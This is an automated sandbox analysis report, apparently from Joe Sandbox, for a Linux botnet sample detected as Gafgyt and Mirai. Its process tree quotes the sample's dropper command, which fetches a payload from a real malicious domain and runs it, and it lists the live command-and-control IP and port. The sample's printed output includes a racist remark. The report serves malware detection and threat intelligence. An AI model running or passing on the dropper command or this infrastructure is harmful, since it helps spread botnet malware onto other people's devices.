Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
x86.elf

Overview

General Information

Sample name:x86.elf
Analysis ID:1686581
Has dependencies:false
MD5:b1a9dfc6e42c89e400efad9451540b1e
SHA1:90bec36b5d46d4f4d06d19360d217b474c9d3f32
SHA256:5f0788259247b6d55e2d7dc87bd5ef445472cd3132b38971b3f252ee8f8ed91e
Tags:elfuser-abuse_ch
Infos:

Detection

Gafgyt, Mirai
Score:96
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Gafgyt
Yara detected Mirai
Contains symbols with names commonly found in malware
Opens /proc/net/* files useful for finding connected devices and routers
Creates hidden files and/or directories
Creates hidden files without content (potentially used as a mutex)
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "rm" command used to delete files or directories
Executes the "wget" command typically used for HTTP/S downloading
Reads the 'hosts' file potentially containing internal network hosts
Sample contains strings that are user agent strings indicative of HTTP manipulation
Sample tries to set the executable flag
Sets full permissions to files and/or directories
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

General Information

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1686581
Start date and time:2025-05-10 07:43:19 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 5s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:x86.elf
Detection:MAL
Classification:mal96.spre.troj.linELF@0/0@6/0

Warnings

  • VT rate limit hit for: gay.energy

Runtime Messages

Command:/tmp/x86.elf
PID:5528
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
gosh that chinese family at the other table sure ate alot
Standard Error:

Process Tree

  • system is lnxubuntu20
  • x86.elf (PID: 5528, Parent: 5445, MD5: b1a9dfc6e42c89e400efad9451540b1e) Arguments: /tmp/x86.elf
    • x86.elf New Fork (PID: 5529, Parent: 5528)
    • sh (PID: 5529, Parent: 5528, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
      • sh New Fork (PID: 5533, Parent: 5529)
      • wget (PID: 5533, Parent: 5529, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -q http://gay.energy/.../vivid -O .....
      • sh New Fork (PID: 5534, Parent: 5529)
      • chmod (PID: 5534, Parent: 5529, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 .....
      • sh New Fork (PID: 5535, Parent: 5529)
      • sh (PID: 5535, Parent: 5529, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh ./.....
      • sh New Fork (PID: 5537, Parent: 5529)
      • rm (PID: 5537, Parent: 5529, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf .....
    • x86.elf New Fork (PID: 5530, Parent: 5528)
    • x86.elf New Fork (PID: 5531, Parent: 5528)
      • x86.elf New Fork (PID: 5532, Parent: 5531)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Bashlite, GafgytBashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
x86.elfJoeSecurity_GafgytYara detected GafgytJoe Security
    x86.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      x86.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x11560:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11574:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11588:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1159c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x115b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x115c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x115d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x115ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11600:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11614:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11628:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1163c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11650:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11664:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x11678:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1168c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x116a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x116b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x116c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x116dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x116f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      x86.elfLinux_Trojan_Gafgyt_a6a2adb9unknownunknown
      • 0xa27:$a: CC 01 C2 89 55 B4 8B 45 B4 C9 C3 55 48 89 E5 48 81 EC 90 00
      x86.elfLinux_Trojan_Gafgyt_9e9530a7unknownunknown
      • 0x95c0:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
      Click to see the 13 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      5530.1.0000000000400000.0000000000416000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        5530.1.0000000000400000.0000000000416000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
        • 0x11560:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x11574:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x11588:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1159c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x115b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x115c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x115d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x115ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x11600:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x11614:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x11628:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1163c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x11650:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x11664:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x11678:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1168c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x116a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x116b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x116c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x116dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x116f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        5530.1.0000000000400000.0000000000416000.r-x.sdmpLinux_Trojan_Gafgyt_a6a2adb9unknownunknown
        • 0xa27:$a: CC 01 C2 89 55 B4 8B 45 B4 C9 C3 55 48 89 E5 48 81 EC 90 00
        5530.1.0000000000400000.0000000000416000.r-x.sdmpLinux_Trojan_Gafgyt_9e9530a7unknownunknown
        • 0x95c0:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
        5530.1.0000000000400000.0000000000416000.r-x.sdmpLinux_Trojan_Gafgyt_f3d83a74unknownunknown
        • 0x94d:$a: DC 00 74 1B 83 7D E0 0A 75 15 83 7D E4 00 79 0F C7 45 C8 01 00
        Click to see the 52 entries

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-05-10T07:44:16.758698+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1558154TCP
        2025-05-10T07:44:32.310593+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1558156TCP
        2025-05-10T07:44:47.867827+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1558158TCP
        2025-05-10T07:45:03.427653+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1558160TCP
        2025-05-10T07:45:18.988148+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1558162TCP
        2025-05-10T07:45:34.547050+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1558164TCP
        2025-05-10T07:45:50.109342+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1558166TCP
        2025-05-10T07:46:05.672211+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1558168TCP
        2025-05-10T07:46:21.231592+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1558170TCP
        2025-05-10T07:46:36.789043+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1558172TCP
        2025-05-10T07:46:52.349507+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1558174TCP
        2025-05-10T07:47:07.905258+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1558176TCP
        2025-05-10T07:47:23.461040+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1558178TCP
        2025-05-10T07:47:39.017777+020028394891Malware Command and Control Activity Detected92.60.77.69666192.168.2.1558180TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-05-10T07:44:16.485852+020028394901Malware Command and Control Activity Detected192.168.2.155815492.60.77.69666TCP
        2025-05-10T07:44:32.037794+020028394901Malware Command and Control Activity Detected192.168.2.155815692.60.77.69666TCP
        2025-05-10T07:44:47.594854+020028394901Malware Command and Control Activity Detected192.168.2.155815892.60.77.69666TCP
        2025-05-10T07:45:03.154401+020028394901Malware Command and Control Activity Detected192.168.2.155816092.60.77.69666TCP
        2025-05-10T07:45:18.714205+020028394901Malware Command and Control Activity Detected192.168.2.155816292.60.77.69666TCP
        2025-05-10T07:45:34.274220+020028394901Malware Command and Control Activity Detected192.168.2.155816492.60.77.69666TCP
        2025-05-10T07:45:49.835535+020028394901Malware Command and Control Activity Detected192.168.2.155816692.60.77.69666TCP
        2025-05-10T07:46:05.397910+020028394901Malware Command and Control Activity Detected192.168.2.155816892.60.77.69666TCP
        2025-05-10T07:46:20.958201+020028394901Malware Command and Control Activity Detected192.168.2.155817092.60.77.69666TCP
        2025-05-10T07:46:36.516331+020028394901Malware Command and Control Activity Detected192.168.2.155817292.60.77.69666TCP
        2025-05-10T07:46:52.076642+020028394901Malware Command and Control Activity Detected192.168.2.155817492.60.77.69666TCP
        2025-05-10T07:47:07.632380+020028394901Malware Command and Control Activity Detected192.168.2.155817692.60.77.69666TCP
        2025-05-10T07:47:23.188326+020028394901Malware Command and Control Activity Detected192.168.2.155817892.60.77.69666TCP
        2025-05-10T07:47:38.744584+020028394901Malware Command and Control Activity Detected192.168.2.155818092.60.77.69666TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: x86.elfAvira: detected
        Multi AV Scanner detection for submitted file
        Source: x86.elfVirustotal: Detection: 62%Perma Link
        Source: x86.elfReversingLabs: Detection: 68%

        Spreading

        barindex
        Opens /proc/net/* files useful for finding connected devices and routers
        Source: /tmp/x86.elf (PID: 5528)Opens: /proc/net/routeJump to behavior

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58160 -> 92.60.77.69:666
        Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58160
        Source: Network trafficSuricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58172 -> 92.60.77.69:666
        Source: Network trafficSuricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58166 -> 92.60.77.69:666
        Source: Network trafficSuricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58170 -> 92.60.77.69:666
        Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58166
        Source: Network trafficSuricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58158 -> 92.60.77.69:666
        Source: Network trafficSuricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58164 -> 92.60.77.69:666
        Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58172
        Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58170
        Source: Network trafficSuricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58168 -> 92.60.77.69:666
        Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58158
        Source: Network trafficSuricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58154 -> 92.60.77.69:666
        Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58168
        Source: Network trafficSuricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58178 -> 92.60.77.69:666
        Source: Network trafficSuricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58162 -> 92.60.77.69:666
        Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58178
        Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58164
        Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58162
        Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58154
        Source: Network trafficSuricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58174 -> 92.60.77.69:666
        Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58174
        Source: Network trafficSuricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58176 -> 92.60.77.69:666
        Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58176
        Source: Network trafficSuricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58156 -> 92.60.77.69:666
        Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58156
        Source: Network trafficSuricata IDS: 2839490 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant Reporting Arch Type (x86) : 192.168.2.15:58180 -> 92.60.77.69:666
        Source: Network trafficSuricata IDS: 2839489 - Severity 1 - ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response : 92.60.77.69:666 -> 192.168.2.15:58180
        Source: global trafficTCP traffic: 192.168.2.15:58154 -> 92.60.77.69:666
        Source: /bin/sh (PID: 5533)Wget executable: /usr/bin/wget -> wget -q http://gay.energy/.../vivid -O .....Jump to behavior
        Source: /usr/bin/wget (PID: 5533)Reads hosts file: /etc/hostsJump to behavior
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: unknownTCP traffic detected without corresponding DNS query: 92.60.77.69
        Source: global trafficDNS traffic detected: DNS query: gay.energy
        Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a6a2adb9 Author: unknown
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_f3d83a74 Author: unknown
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a0a4de11 Author: unknown
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_09c3070e Author: unknown
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_46eec778 Author: unknown
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_dd0d6173 Author: unknown
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_779e142f Author: unknown
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_cf84c9f2 Author: unknown
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_859042a0 Author: unknown
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
        Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_862c4e0e Author: unknown
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a6a2adb9 Author: unknown
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_f3d83a74 Author: unknown
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a0a4de11 Author: unknown
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_09c3070e Author: unknown
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_46eec778 Author: unknown
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_dd0d6173 Author: unknown
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_779e142f Author: unknown
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_cf84c9f2 Author: unknown
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_859042a0 Author: unknown
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
        Source: 5530.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_862c4e0e Author: unknown
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a6a2adb9 Author: unknown
        Source: 5531.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
